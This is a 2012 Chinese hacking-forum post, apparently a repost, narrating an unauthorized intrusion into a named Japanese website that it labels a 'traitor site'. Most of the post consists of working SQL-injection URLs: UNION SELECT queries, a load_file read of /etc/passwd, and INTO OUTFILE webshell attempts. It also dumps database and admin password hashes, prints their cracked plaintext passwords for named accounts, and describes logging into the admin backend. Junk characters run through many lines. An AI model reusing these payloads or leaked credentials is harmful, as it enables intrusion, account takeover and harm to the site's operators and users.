找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3448|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试
& y- d: {4 W) {8 v7 s0 T
; z8 h' t1 a5 _0 h3 A# w. C
0x01. 检测 www.zuaa.jp 收集数据
8 r2 j% U/ e: X1 e9 ]8 g' `( f4 |9 _4 j6 ~4 |

6 w/ R# n( S+ rwhatweb. d& t0 O3 V5 U) s

$ Y* K+ c  ]1 I, o. H$ B0 z1 b' D/ M6 L8 T  I$ {
利用NMAP扫描0 N" I7 ~  F8 H1 {  ~' Y

! s8 E0 [! }% J% Y5 }; ]中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持0 t  R  p6 s6 a% u
0x02.找注入点& X9 y3 ]- C8 h' u1 G$ h& J
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
* l. ]9 k6 X, D  a( S- J4 m
5 G7 {- D- Y4 r2 ?  J1 Q" g# i. y( X2 V5 Y3 e" b" _9 s
0x03.order by7 H! h( M2 B) i1 a- h* q! y  e% ]
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
0 h; R8 m! l3 ?6 z; |2 q( k4 o8 x+ v, L4 ^4 g& p3 A+ Y
order by 28报错,order by 27正常
, ^- s! A, [' x- H% x- Y/ z/ o# Z2 Z( r4 V. M  ?" ^, X
0x04.   union手动查询
6 v' a* p  \/ u0 t* f9 E' z- Qhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 & I1 B( t1 {, r4 L: d* O9 x6 C
添加到 27 时正常显示 4 |8 S: X- P. G# O2 {4 G% l4 y

3 t6 ^8 n, F+ z; l& B& @" V. Y中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
5 Y& |" ~$ [! t& m0 N0 C& b/ y& e1 S$ d$ t; I& J
0x05. info:1 a6 H& c1 `) W* l' h
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 3 e+ r. h, v" d! R. u7 C* l
$ y* @% L% `: K+ r: [
user:            root@localhost! t- U3 M8 x) o% N3 W
database:    openpne# a& t8 Q1 N! B# Y' w5 c
version:      4.1.22. p( G8 E3 A" U2 s- K9 J+ C
os:             portbld-freebsd5.4. L) a; P) i3 U7 s9 W: e0 B( h9 b
! M$ }) p; E( v4 J8 u. k
0x06. root用户
' P  i" V7 U( Q8 n! B! g) c利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)3 e' o" x! q8 o0 a% Y, _
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 3 b9 d" m# d; a/ v$ A5 w
& _, ~# v7 R) K# e- C
通过工具转换* `7 L* o& w  F
( d7 y0 G. N  `- I4 S1 u4 i# d- q
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持7 l& X, Z" f# ]5 M
4 T9 H; Z9 [  {; \+ P4 V, }
0x07. 利用 into outfile
; ]& E& T% A0 A  c; \全部都失败
, ~* F" E9 e$ zhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php+ A9 x; s7 B; E+ [! s3 y* G- d
$ I6 u# d; ~; ]& e5 C
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php 4 Q# H+ s0 P/ V8 ?( ?* h; d
6 t, c7 E* D# Z7 U2 X8 ^
页面显示“MDB2 Error:syntax error”1 @( Q& b, Q& q/ D* r, Y, y* I
8 N1 E+ S: B: o8 ?
0x08. 利用 mysql 4.1
+ k; y- @+ m. k, K* g0 L猜常规表名,字段未果 工具 sqlmap5 ~) e" g0 {/ W
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
% z0 c' }2 P+ l3 w1 p* Z5 w
3 a8 K8 N7 V1 L. H. n
% T4 m' B$ d* w7 `1 C; i
3 g6 [- t7 }, ^1 \0x09. 查找后台
1 x2 H* {  \9 b7 X) `利用 现有的各种 后台工具尝试都不行& Q, k3 V9 P  s4 K* R- ~5 K
; w+ e- ?' _+ k0 A, P( j
0x10.  MySL外联方法7 ?* i+ f7 {# h0 _2 |
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
$ ~" k# v# D  \7 F, v' s6 p可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
: M0 U5 L7 D" p/ \2 ^5 Q' Vhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
7 A- R) K9 ~+ Z3 s4 j, I' n+ O) C/ d9 ?
这个可以在 www.cmd5.com 解密
$ v8 j0 B5 y& E) U% f7 Proot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
' v5 G4 o7 {+ s4 x- G9 mchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
  K! j* B: B0 m7 v2 L; Wopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???. O+ |' d' s% ?8 X+ V  ]
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???! X% U$ }8 j8 v& `
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
: V  {; x9 p' l) [0 C+ U9 `. v8 b
+ j- e- g3 b1 ~) y4 Y" \" `" `; R+ ]
0x11. 网站突破
! I& n* s# @7 {发现网站的源程序 openpne, google 下载 openpne 源码% @# [# u" v1 `0 i. u1 }$ s) @
: z8 o$ f2 ^4 u( R
  P4 ^  v8 ]4 t8 P, Y  u
0x12. 默认信息利用
  r' a# D% _  F  R* Dhttp://sns.zuaa.jp/?m=admin&a=page_login( h3 p) U" n7 A% n% a

% J: ?( A. \% E- z表名 (c_admin_user) ,字段名(username,password)
3 \. X- r: _# r$ B+ ~7 K. mhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user" t" U- X& t5 i6 n: K) j1 }2 |7 M

, K% \/ Y9 u6 d0 h3 C8 Y解密
9 L  \2 c* E& b, x6 e0 j! Zzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
% w  N* k, J$ T' K. [; k& _7 e' Szuaajp:c0923ec5857796a393da99905008c176,          zju1897/ u, a7 ?- T+ {' ]$ [
: _& Q2 e( {: T
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
) |9 N) F# c3 Q* P/ u  x
' L2 `' O! o- L7 }. D7 A' |* V0x13. 登录后台
- _# S3 p1 P3 l4 d
  z6 f. d1 S. a8 Q$ ?1 s
+ T1 E$ ]% R5 s5 \2 V* c$ }; W! b& e' |  p3 d" g, F1 a
0x14. 小结' D! |3 _0 [. D" l8 O9 Q  C/ o
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
* j* ^2 L* T, f, @+ z4 ]/ |感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点' r+ Q) h2 ~% T
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain1 j' Y( O- @( ^, ~9 ~
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持+ b3 o5 ~# J/ r( Y5 `4 C7 M2 R

( {* s7 i1 R9 k: L3 O: O最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
- _7 J3 }  d9 x1 d( b9 t+ l8 r1 W/ ?  T

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表